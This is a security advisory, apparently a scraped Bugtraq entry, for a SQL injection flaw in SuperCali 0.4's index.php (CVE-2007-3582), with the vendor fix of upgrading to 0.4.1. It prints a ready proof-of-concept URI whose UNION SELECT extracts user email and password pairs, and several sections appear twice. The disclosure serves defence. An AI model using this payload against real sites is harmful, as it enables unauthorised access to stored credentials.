SuperCali Index.PHP SQL Injection Vulnerability
BID:24756
Info
SuperCali Index.PHP SQL Injection Vulnerability
| Bugtraq ID: | 24756 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3582 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 03 2007 12:00AM |
| Updated: | May 07 2015 05:37PM |
| Credit: | t0pP8uZz & xprog are credited with the discovery of this vulnerability. |
| Vulnerable: |
Inforest Communications SuperCali 0.4 |
| Not Vulnerable: |
Inforest Communications SuperCali 0.4.1 |
Discussion
SuperCali Index.PHP SQL Injection Vulnerability
SuperCali is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SuperCali 4.0 is vulnerable; other versions may also be affected.
SuperCali is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SuperCali 4.0 is vulnerable; other versions may also be affected.
Exploit / POC
SuperCali Index.PHP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?o=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(email,0x3a,password),4,5,0x677269642E706870/**/from/**/users/*
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?o=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(email,0x3a,password),4,5,0x677269642E706870/**/from/**/users/*
Solution / Fix
SuperCali Index.PHP SQL Injection Vulnerability
Solution:
The vendor released SuperCali 0.4.1 to address this issue. Please see the references for more information.
Inforest Communications SuperCali 0.4
Solution:
The vendor released SuperCali 0.4.1 to address this issue. Please see the references for more information.
Inforest Communications SuperCali 0.4
-
Inforest Communications supercali-0.4.1.tar.gz
http://supercali.inforest.com/downloads/supercali-0.4.1.tar.gz
References
SuperCali Index.PHP SQL Injection Vulnerability
References:
References:
- SuperCali Homepage (Inforest Communications)